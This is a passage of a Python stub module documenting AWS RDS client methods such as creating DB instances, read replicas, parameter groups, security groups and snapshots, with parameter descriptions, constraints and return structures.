10.50.6529.0.v1 (supported for all editions, and all AWS regions except us-east-2)
10.50.6000.34.v1 (supported for all editions, and all AWS regions except us-east-2)
10.50.2789.0.v1 (supported for all editions, and all AWS regions except us-east-2)
MySQL
Version 5.7 (available in all AWS regions): 5.7.11
Version 5.7 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.7.10
Version 5.6 (available in all AWS regions): 5.6.29
Version 5.6 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.6.27
Version 5.6 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.6.23
Version 5.6 (available in these AWS regions: ap-northeast-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.6.19a | 5.6.19b | 5.6.21 | 5.6.21b | 5.6.22
Version 5.5 (available in all AWS regions): 5.5.46
Version 5.1 (only available in AWS regions ap-northeast-1, ap-southeast-1, ap-southeast-2, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.1.73a | 5.1.73b
Oracle 12c
12.1.0.2.v8 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v7 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v6 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v5 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v4 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v3 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v2 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v1 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
Oracle 11g
11.2.0.4.v12 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v11 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v10 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v9 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v8 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v7 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v6 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v5 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v4 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v3 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v1 (supported for EE, SE1, and SE, in all AWS regions)
PostgreSQL
Version 9.6.x: 9.6.1 | 9.6.2
Version 9.5.x: 9.5.6 | 9.5.4 | 9.5.2
Version 9.4.x: 9.4.11 | 9.4.9 | 9.4.7
Version 9.3.x: 9.3.16 | 9.3.14 | 9.3.12
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade: Indicates that minor engine upgrades will be applied automatically to the DB instance during the maintenance window.
Default: true
:type LicenseModel: string
:param LicenseModel: License model information for this DB instance.
Valid values: license-included | bring-your-own-license | general-public-license
:type Iops: integer
:param Iops: The amount of Provisioned IOPS (input/output operations per second) to be initially allocated for the DB instance.
Constraints: Must be a multiple between 3 and 10 of the storage amount for the DB instance. Must also be an integer multiple of 1000. For example, if the size of your DB instance is 500 GB, then your Iops value can be 2000, 3000, 4000, or 5000.
:type OptionGroupName: string
:param OptionGroupName: Indicates that the DB instance should be associated with the specified option group.
Permanent options, such as the TDE option for Oracle Advanced Security TDE, cannot be removed from an option group, and that option group cannot be removed from a DB instance once it is associated with a DB instance
:type CharacterSetName: string
:param CharacterSetName: For supported engines, indicates that the DB instance should be associated with the specified CharacterSet.
:type PubliclyAccessible: boolean
:param PubliclyAccessible: Specifies the accessibility options for the DB instance. A value of true specifies an Internet-facing instance with a publicly resolvable DNS name, which resolves to a public IP address. A value of false specifies an internal instance with a DNS name that resolves to a private IP address.
Default: The default behavior varies depending on whether a VPC has been requested or not. The following list shows the default behavior in each case.
Default VPC: true
VPC: false
If no DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be publicly accessible. If a specific DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be private.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type DBClusterIdentifier: string
:param DBClusterIdentifier: The identifier of the DB cluster that the instance will belong to.
For information on creating a DB cluster, see CreateDBCluster .
Type: String
:type StorageType: string
:param StorageType: Specifies the storage type to be associated with the DB instance.
Valid values: standard | gp2 | io1
If you specify io1 , you must also include a value for the Iops parameter.
Default: io1 if the Iops parameter is specified; otherwise standard
:type TdeCredentialArn: string
:param TdeCredentialArn: The ARN from the Key Store with which to associate the instance for TDE encryption.
:type TdeCredentialPassword: string
:param TdeCredentialPassword: The password for the given ARN from the Key Store in order to access the device.
:type StorageEncrypted: boolean
:param StorageEncrypted: Specifies whether the DB instance is encrypted.
Default: false
:type KmsKeyId: string
:param KmsKeyId: The KMS key identifier for an encrypted DB instance.
The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are creating a DB instance with the same AWS account that owns the KMS encryption key used to encrypt the new DB instance, then you can use the KMS key alias instead of the ARN for the KMS encryption key.
If the StorageEncrypted parameter is true, and you do not specify a value for the KmsKeyId parameter, then Amazon RDS will use your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS region.
:type Domain: string
:param Domain: Specify the Active Directory Domain to create the instance in.
:type CopyTagsToSnapshot: boolean
:param CopyTagsToSnapshot: True to copy all tags from the DB instance to snapshots of the DB instance; otherwise false. The default is false.
:type MonitoringInterval: integer
:param MonitoringInterval: The interval, in seconds, between points when Enhanced Monitoring metrics are collected for the DB instance. To disable collecting Enhanced Monitoring metrics, specify 0. The default is 0.
If MonitoringRoleArn is specified, then you must also set MonitoringInterval to a value other than 0.
Valid Values: 0, 1, 5, 10, 15, 30, 60
:type MonitoringRoleArn: string
:param MonitoringRoleArn: The ARN for the IAM role that permits RDS to send enhanced monitoring metrics to CloudWatch Logs. For example, arn:aws:iam::123456789012:role/emaccess . For information on creating a monitoring role, go to Setting Up and Enabling Enhanced Monitoring .
If MonitoringInterval is set to a value other than 0, then you must supply a MonitoringRoleArn value.
:type DomainIAMRoleName: string
:param DomainIAMRoleName: Specify the name of the IAM role to be used when making API calls to the Directory Service.
:type PromotionTier: integer
:param PromotionTier: A value that specifies the order in which an Aurora Replica is promoted to the primary instance after a failure of the existing primary instance. For more information, see Fault Tolerance for an Aurora DB Cluster .
Default: 1
Valid Values: 0 - 15
:type Timezone: string
:param Timezone: The time zone of the DB instance. The time zone parameter is currently supported only by Microsoft SQL Server .
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
You can enable IAM database authentication for the following database engines
For MySQL 5.6, minor version 5.6.34 or higher
For MySQL 5.7, minor version 5.7.16 or higher
Default: false
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def create_db_instance_read_replica(DBInstanceIdentifier=None, SourceDBInstanceIdentifier=None, DBInstanceClass=None, AvailabilityZone=None, Port=None, AutoMinorVersionUpgrade=None, Iops=None, OptionGroupName=None, PubliclyAccessible=None, Tags=None, DBSubnetGroupName=None, StorageType=None, CopyTagsToSnapshot=None, MonitoringInterval=None, MonitoringRoleArn=None, KmsKeyId=None, PreSignedUrl=None, EnableIAMDatabaseAuthentication=None, SourceRegion=None):
    """
    Creates a DB instance for a DB instance running MySQL, MariaDB, or PostgreSQL that acts as a Read Replica of a source DB instance.
    All Read Replica DB instances are created as Single-AZ deployments with backups disabled. All other DB instance attributes (including DB security groups and DB parameter groups) are inherited from the source DB instance, except as specified below.
    You can create an encrypted Read Replica in a different AWS Region than the source DB instance. In that case, the region where you call the CreateDBInstanceReadReplica action is the destination region of the encrypted Read Replica. The source DB instance must be encrypted.
    To create an encrypted Read Replica in another AWS Region, you must provide the following values:
    To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
    See also: AWS API Documentation
    Examples
    This example creates a DB instance read replica.
    Expected Output:
    :example: response = client.create_db_instance_read_replica(
        DBInstanceIdentifier='string',
        SourceDBInstanceIdentifier='string',
        DBInstanceClass='string',
        AvailabilityZone='string',
        Port=123,
        AutoMinorVersionUpgrade=True|False,
        Iops=123,
        OptionGroupName='string',
        PubliclyAccessible=True|False,
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ],
        DBSubnetGroupName='string',
        StorageType='string',
        CopyTagsToSnapshot=True|False,
        MonitoringInterval=123,
        MonitoringRoleArn='string',
        KmsKeyId='string',
        EnableIAMDatabaseAuthentication=True|False,
        SourceRegion='string'
    )
    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: [REQUIRED]
    The DB instance identifier of the Read Replica. This identifier is the unique key that identifies a DB instance. This parameter is stored as a lowercase string.
    :type SourceDBInstanceIdentifier: string
    :param SourceDBInstanceIdentifier: [REQUIRED]
    The identifier of the DB instance that will act as the source for the Read Replica. Each DB instance can have up to five Read Replicas.
    Constraints:
    Must be the identifier of an existing MySQL, MariaDB, or PostgreSQL DB instance.
    Can specify a DB instance that is a MySQL Read Replica only if the source is running MySQL 5.6.
    Can specify a DB instance that is a PostgreSQL DB instance only if the source is running PostgreSQL 9.3.5 or later.
    The specified DB instance must have automatic backups enabled, its backup retention period must be greater than 0.
    If the source DB instance is in the same region as the Read Replica, specify a valid DB instance identifier.
    If the source DB instance is in a different region than the Read Replica, specify a valid DB instance ARN. For more information, go to Constructing an Amazon RDS Amazon Resource Name (ARN) .
    :type DBInstanceClass: string
    :param DBInstanceClass: The compute and memory capacity of the Read Replica. Note that not all instance classes are available in all regions for all DB engines.
    Valid Values: db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.xlarge | db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
    Default: Inherits from the source DB instance.
    :type AvailabilityZone: string
    :param AvailabilityZone: The Amazon EC2 Availability Zone that the Read Replica will be created in.
    Default: A random, system-chosen Availability Zone in the endpoint's region.
    Example: us-east-1d
    :type Port: integer
    :param Port: The port number that the DB instance uses for connections.
    Default: Inherits from the source DB instance
    Valid Values: 1150-65535
    :type AutoMinorVersionUpgrade: boolean
    :param AutoMinorVersionUpgrade: Indicates that minor engine upgrades will be applied automatically to the Read Replica during the maintenance window.
    Default: Inherits from the source DB instance
    :type Iops: integer
    :param Iops: The amount of Provisioned IOPS (input/output operations per second) to be initially allocated for the DB instance.
    :type OptionGroupName: string
    :param OptionGroupName: The option group the DB instance will be associated with. If omitted, the default option group for the engine specified will be used.
    :type PubliclyAccessible: boolean
    :param PubliclyAccessible: Specifies the accessibility options for the DB instance. A value of true specifies an Internet-facing instance with a publicly resolvable DNS name, which resolves to a public IP address. A value of false specifies an internal instance with a DNS name that resolves to a private IP address.
    Default: The default behavior varies depending on whether a VPC has been requested or not. The following list shows the default behavior in each case.
    Default VPC: true
    VPC: false
    If no DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be publicly accessible. If a specific DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be private.
    :type Tags: list
    :param Tags: A list of tags.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: Specifies a DB subnet group for the DB instance. The new DB instance will be created in the VPC associated with the DB subnet group. If no DB subnet group is specified, then the new DB instance is not created in a VPC.
    Constraints:
    Can only be specified if the source DB instance identifier specifies a DB instance in another region.
    The specified DB subnet group must be in the same region in which the operation is running.
    All Read Replicas in one region that are created from the same source DB instance must either:
    Specify DB subnet groups from the same VPC. All these Read Replicas will be created in the same VPC.
    Not specify a DB subnet group. All these Read Replicas will be created outside of any VPC.
    Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
    Example: mySubnetgroup
    :type StorageType: string
    :param StorageType: Specifies the storage type to be associated with the Read Replica.
    Valid values: standard | gp2 | io1
    If you specify io1 , you must also include a value for the Iops parameter.
    Default: io1 if the Iops parameter is specified; otherwise standard
    :type CopyTagsToSnapshot: boolean
    :param CopyTagsToSnapshot: True to copy all tags from the Read Replica to snapshots of the Read Replica; otherwise false. The default is false.
    :type MonitoringInterval: integer
    :param MonitoringInterval: The interval, in seconds, between points when Enhanced Monitoring metrics are collected for the Read Replica. To disable collecting Enhanced Monitoring metrics, specify 0. The default is 0.
    If MonitoringRoleArn is specified, then you must also set MonitoringInterval to a value other than 0.
    Valid Values: 0, 1, 5, 10, 15, 30, 60
    :type MonitoringRoleArn: string
    :param MonitoringRoleArn: The ARN for the IAM role that permits RDS to send enhanced monitoring metrics to CloudWatch Logs. For example, arn:aws:iam::123456789012:role/emaccess . For information on creating a monitoring role, go to To create an IAM role for Amazon RDS Enhanced Monitoring .
    If MonitoringInterval is set to a value other than 0, then you must supply a MonitoringRoleArn value.
    :type KmsKeyId: string
    :param KmsKeyId: The AWS KMS key ID for an encrypted Read Replica. The KMS key ID is the Amazon Resource Name (ARN), KMS key identifier, or the KMS key alias for the KMS encryption key.
    If you create an unencrypted Read Replica and specify a value for the KmsKeyId parameter, Amazon RDS encrypts the target Read Replica using the specified KMS encryption key.
    If you create an encrypted Read Replica from your AWS account, you can specify a value for KmsKeyId to encrypt the Read Replica with a new KMS encryption key. If you don't specify a value for KmsKeyId , then the Read Replica is encrypted with the same KMS key as the source DB instance.
    If you create an encrypted Read Replica in a different AWS region, then you must specify a KMS key for the destination AWS region. KMS encryption keys are specific to the region that they are created in, and you cannot use encryption keys from one region in another region.
    :type PreSignedUrl: string
    :param PreSignedUrl: The URL that contains a Signature Version 4 signed request for the CreateDBInstanceReadReplica API action in the AWS region that contains the source DB instance. The PreSignedUrl parameter must be used when encrypting a Read Replica from another AWS region.
    The presigned URL must be a valid request for the CreateDBInstanceReadReplica API action that can be executed in the source region that contains the encrypted DB instance. The presigned URL request must contain the following parameter values:
    DestinationRegion - The AWS Region that the Read Replica is created in. This region is the same one where the CreateDBInstanceReadReplica action is called that contains this presigned URL. For example, if you create an encrypted Read Replica in the us-east-1 region, and the source DB instance is in the us-west-2 region, then you call the CreateDBInstanceReadReplica action in the us-east-1 region and provide a presigned URL that contains a call to the CreateDBInstanceReadReplica action in the us-west-2 region. For this example, the DestinationRegion in the presigned URL must be set to the us-east-1 region.
    KmsKeyId - The KMS key identifier for the key to use to encrypt the Read Replica in the destination region. This is the same identifier for both the CreateDBInstanceReadReplica action that is called in the destination region, and the action contained in the presigned URL.
    SourceDBInstanceIdentifier - The DB instance identifier for the encrypted Read Replica to be created. This identifier must be in the Amazon Resource Name (ARN) format for the source region. For example, if you create an encrypted Read Replica from a DB instance in the us-west-2 region, then your SourceDBInstanceIdentifier would look like this example: arn:aws:rds:us-west-2:123456789012:instance:mysql-instance1-instance-20161115 .
    To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
    Please note that this parameter is automatically populated if it is not provided. Including this parameter is not required
    :type EnableIAMDatabaseAuthentication: boolean
    :param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
    You can enable IAM database authentication for the following database engines
    For MySQL 5.6, minor version 5.6.34 or higher
    For MySQL 5.7, minor version 5.7.16 or higher
    Aurora 5.6 or higher.
    Default: false
    :type SourceRegion: string
    :param SourceRegion: The ID of the region that contains the source for the read replica.
    :rtype: dict
    :return: {
        'DBInstance': {
            'DBInstanceIdentifier': 'string',
            'DBInstanceClass': 'string',
            'Engine': 'string',
            'DBInstanceStatus': 'string',
            'MasterUsername': 'string',
            'DBName': 'string',
            'Endpoint': {
                'Address': 'string',
                'Port': 123,
                'HostedZoneId': 'string'
            },
            'AllocatedStorage': 123,
            'InstanceCreateTime': datetime(2015, 1, 1),
            'PreferredBackupWindow': 'string',
            'BackupRetentionPeriod': 123,
            'DBSecurityGroups': [
                {
                    'DBSecurityGroupName': 'string',
                    'Status': 'string'
                },
            ],
            'VpcSecurityGroups': [
                {
                    'VpcSecurityGroupId': 'string',
                    'Status': 'string'
                },
            ],
            'DBParameterGroups': [
                {
                    'DBParameterGroupName': 'string',
                    'ParameterApplyStatus': 'string'
                },
            ],
            'AvailabilityZone': 'string',
            'DBSubnetGroup': {
                'DBSubnetGroupName': 'string',
                'DBSubnetGroupDescription': 'string',
                'VpcId': 'string',
                'SubnetGroupStatus': 'string',
                'Subnets': [
                    {
                        'SubnetIdentifier': 'string',
                        'SubnetAvailabilityZone': {
                            'Name': 'string'
                        },
                        'SubnetStatus': 'string'
                    },
                ],
                'DBSubnetGroupArn': 'string'
            },
            'PreferredMaintenanceWindow': 'string',
            'PendingModifiedValues': {
                'DBInstanceClass': 'string',
                'AllocatedStorage': 123,
                'MasterUserPassword': 'string',
                'Port': 123,
                'BackupRetentionPeriod': 123,
                'MultiAZ': True|False,
                'EngineVersion': 'string',
                'LicenseModel': 'string',
                'Iops': 123,
                'DBInstanceIdentifier': 'string',
                'StorageType': 'string',
                'CACertificateIdentifier': 'string',
                'DBSubnetGroupName': 'string'
            },
            'LatestRestorableTime': datetime(2015, 1, 1),
            'MultiAZ': True|False,
            'EngineVersion': 'string',
            'AutoMinorVersionUpgrade': True|False,
            'ReadReplicaSourceDBInstanceIdentifier': 'string',
            'ReadReplicaDBInstanceIdentifiers': [
                'string',
            ],
            'ReadReplicaDBClusterIdentifiers': [
                'string',
            ],
            'LicenseModel': 'string',
            'Iops': 123,
            'OptionGroupMemberships': [
                {
                    'OptionGroupName': 'string',
                    'Status': 'string'
                },
            ],
            'CharacterSetName': 'string',
            'SecondaryAvailabilityZone': 'string',
            'PubliclyAccessible': True|False,
            'StatusInfos': [
                {
                    'StatusType': 'string',
                    'Normal': True|False,
                    'Status': 'string',
                    'Message': 'string'
                },
            ],
            'StorageType': 'string',
            'TdeCredentialArn': 'string',
            'DbInstancePort': 123,
            'DBClusterIdentifier': 'string',
            'StorageEncrypted': True|False,
            'KmsKeyId': 'string',
            'DbiResourceId': 'string',
            'CACertificateIdentifier': 'string',
            'DomainMemberships': [
                {
                    'Domain': 'string',
                    'Status': 'string',
                    'FQDN': 'string',
                    'IAMRoleName': 'string'
                },
            ],
            'CopyTagsToSnapshot': True|False,
            'MonitoringInterval': 123,
            'EnhancedMonitoringResourceArn': 'string',
            'MonitoringRoleArn': 'string',
            'PromotionTier': 123,
            'DBInstanceArn': 'string',
            'Timezone': 'string',
            'IAMDatabaseAuthenticationEnabled': True|False
        }
    }
    :returns:
    DBInstanceIdentifier - The identifier for the encrypted Read Replica in the destination region.
    SourceDBInstanceIdentifier - The DB instance identifier for the encrypted Read Replica. This identifier must be in the ARN format for the source region and is the same value as the SourceDBInstanceIdentifier in the presigned URL.
    """
    # Documentation stub only: no client logic is visible here — presumably the
    # real request is dispatched by the botocore runtime. TODO confirm.
    pass
def create_db_parameter_group(DBParameterGroupName=None, DBParameterGroupFamily=None, Description=None, Tags=None):
    """
    Creates a new DB parameter group.
    A DB parameter group is initially created with the default parameters for the database engine used by the DB instance. To provide custom values for any of the parameters, you must modify the group after creating it using ModifyDBParameterGroup . Once you've created a DB parameter group, you need to associate it with your DB instance using ModifyDBInstance . When you associate a new DB parameter group with a running DB instance, you need to reboot the DB instance without failover for the new DB parameter group and associated settings to take effect.
    See also: AWS API Documentation
    Examples
    This example creates a DB parameter group.
    Expected Output:
    :example: response = client.create_db_parameter_group(
        DBParameterGroupName='string',
        DBParameterGroupFamily='string',
        Description='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type DBParameterGroupName: string
    :param DBParameterGroupName: [REQUIRED]
    The name of the DB parameter group.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    Note
    This value is stored as a lowercase string.
    :type DBParameterGroupFamily: string
    :param DBParameterGroupFamily: [REQUIRED]
    The DB parameter group family name. A DB parameter group can be associated with one and only one DB parameter group family, and can be applied only to a DB instance running a database engine and engine version compatible with that DB parameter group family.
    :type Description: string
    :param Description: [REQUIRED]
    The description for the DB parameter group.
    :type Tags: list
    :param Tags: A list of tags.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :rtype: dict
    :return: {
        'DBParameterGroup': {
            'DBParameterGroupName': 'string',
            'DBParameterGroupFamily': 'string',
            'Description': 'string',
            'DBParameterGroupArn': 'string'
        }
    }
    """
    # Documentation stub only: no client logic is visible here — presumably the
    # real request is dispatched by the botocore runtime. TODO confirm.
    pass
def create_db_security_group(DBSecurityGroupName=None, DBSecurityGroupDescription=None, Tags=None):
    """
    Creates a new DB security group. DB security groups control access to a DB instance.
    See also: AWS API Documentation
    Examples
    This example creates a DB security group.
    Expected Output:
    :example: response = client.create_db_security_group(
        DBSecurityGroupName='string',
        DBSecurityGroupDescription='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type DBSecurityGroupName: string
    :param DBSecurityGroupName: [REQUIRED]
        The name for the DB security group. This value is stored as a lowercase string.
        Constraints:
        Must be 1 to 255 alphanumeric characters
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
        Must not be 'Default'
        Example: mysecuritygroup
    :type DBSecurityGroupDescription: string
    :param DBSecurityGroupDescription: [REQUIRED]
        The description for the DB security group.
    :type Tags: list
    :param Tags: A list of tags.
        (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
        Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
        Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :rtype: dict
    :return: {
        'DBSecurityGroup': {
            'OwnerId': 'string',
            'DBSecurityGroupName': 'string',
            'DBSecurityGroupDescription': 'string',
            'VpcId': 'string',
            'EC2SecurityGroups': [
                {
                    'Status': 'string',
                    'EC2SecurityGroupName': 'string',
                    'EC2SecurityGroupId': 'string',
                    'EC2SecurityGroupOwnerId': 'string'
                },
            ],
            'IPRanges': [
                {
                    'Status': 'string',
                    'CIDRIP': 'string'
                },
            ],
            'DBSecurityGroupArn': 'string'
        }
    }
    :returns:
    DescribeDBSecurityGroups
    AuthorizeDBSecurityGroupIngress
    CreateDBSecurityGroup
    RevokeDBSecurityGroupIngress
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def create_db_snapshot(DBSnapshotIdentifier=None, DBInstanceIdentifier=None, Tags=None):
    """
    Creates a DBSnapshot. The source DBInstance must be in "available" state.
    See also: AWS API Documentation
    Examples
    This example creates a DB snapshot.
    Expected Output:
    :example: response = client.create_db_snapshot(
        DBSnapshotIdentifier='string',
        DBInstanceIdentifier='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type DBSnapshotIdentifier: string
    :param DBSnapshotIdentifier: [REQUIRED]
        The identifier for the DB snapshot.
        Constraints:
        Cannot be null, empty, or blank
        Must contain from 1 to 255 alphanumeric characters or hyphens
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
        Example: my-snapshot-id
    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: [REQUIRED]
        The DB instance identifier. This is the unique key that identifies a DB instance.
        Constraints:
        Must contain from 1 to 63 alphanumeric characters or hyphens
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
    :type Tags: list
    :param Tags: A list of tags.
        (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
        Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
